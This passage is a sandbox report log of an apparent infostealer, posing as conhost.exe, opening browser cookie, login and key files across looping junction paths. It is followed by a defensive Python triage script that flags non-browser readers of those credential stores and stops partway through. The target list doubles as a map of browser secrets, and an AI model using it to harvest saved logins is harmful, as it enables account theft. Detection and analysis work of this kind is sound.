                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
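The access list above is noisy for two reasons that matter when triaging it: the paths are spelled many different ways, and only a handful of the targets are actually credential material. The repeated "Application Data\Application Data\..." and "Local Settings\..." segments are not separate directories; they are the per-user compatibility junctions (C:\Users\<u>\Local Settings -> AppData\Local and C:\Users\<u>\AppData\Local\Application Data -> AppData\Local) that the stealer's recursive walk followed in a loop. The added example below (not part of the Joe Sandbox report) collapses those junctions to one canonical path, keeps only Chromium credential stores (Login Data, Cookies, Local State), and reports every non-browser process image that opened them. The sample lines are constructed in the report's format; the chrome.exe install path and the browser allowlist are assumptions.

```python
import re

# Joe Sandbox prints each access as "Source: <image>File opened: <path>" on one line.
LINE_RE = re.compile(r"^Source: (?P<image>.+?\.exe)File opened: (?P<path>.+)$")

# Per-user junctions Windows keeps for pre-Vista compatibility:
#   C:\Users\<u>\Local Settings                 -> C:\Users\<u>\AppData\Local
#   C:\Users\<u>\AppData\Local\Application Data -> C:\Users\<u>\AppData\Local
# A recursive walk that follows them cycles ("...\Application Data\Application Data\...")
# until MAX_PATH stops it, which is what produced the repeated segments in the report.
_LOCAL_SETTINGS = re.compile(r"^(?P<root>[A-Za-z]:\\Users\\[^\\]+)\\Local Settings(?=\\|$)")
_APP_DATA_LOOP = re.compile(r"(?<=\\AppData\\Local)\\Application Data(?=\\|$)")

# Chromium credential material: the two SQLite stores and the Local State JSON that
# carries the DPAPI-wrapped AES key needed to decrypt values in both.
BROWSER_DIRS = (r"\Google\Chrome\User Data", r"\Microsoft\Edge\User Data")
BROWSER_IMAGES = {"chrome.exe", "msedge.exe"}  # assumption: the only legitimate readers

# Constructed sample lines in the report's format. The chrome.exe line is a control
# showing the browser reading its own store; that install path is an assumption.
SAMPLE_LINES = [
    r"Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe"
    r"File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal",
    r"Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe"
    r"File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe"
    r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe"
    r"File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State",
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe"
    r"File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
]


def canonicalize(path: str) -> str:
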